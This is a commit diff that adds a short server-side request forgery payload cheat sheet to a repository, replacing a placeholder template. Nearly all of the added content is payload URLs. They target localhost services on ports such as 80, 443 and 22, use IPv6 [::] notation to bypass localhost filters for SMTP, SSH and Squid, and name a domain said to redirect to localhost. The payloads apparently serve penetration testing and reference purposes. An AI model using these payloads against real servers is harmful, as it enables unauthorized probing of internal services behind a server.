SSRF payloads
parent
c097f222f4
commit
a76711ed59
|
@ -1,12 +1,34 @@
|
||||||
# Title
|
# Server-Side Request Forgery
|
||||||
Lorem
|
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
|
||||||
|
|
||||||
## Vuln
|
## Exploit
|
||||||
|
|
||||||
|
Basic SSRF v1
|
||||||
```
|
```
|
||||||
Code
|
http://127.0.0.1:80
|
||||||
|
http://127.0.0.1:443
|
||||||
|
http://127.0.0.1:22
|
||||||
|
```
|
||||||
|
|
||||||
|
Basic SSRF v2
|
||||||
|
```
|
||||||
|
http://localhost:80
|
||||||
|
http://localhost:443
|
||||||
|
http://localhost:22
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with [::]
|
||||||
|
```
|
||||||
|
http://[::]:80/
|
||||||
|
http://[::]:25/ SMTP
|
||||||
|
http://[::]:22/ SSH
|
||||||
|
http://[::]:3128/ Squid
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with a domain redirecting to locahost
|
||||||
|
```
|
||||||
|
http://n-pn.info
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* Lorem
|
*
|
||||||
* Ipsum
|
|
Loading…
Reference in New Issue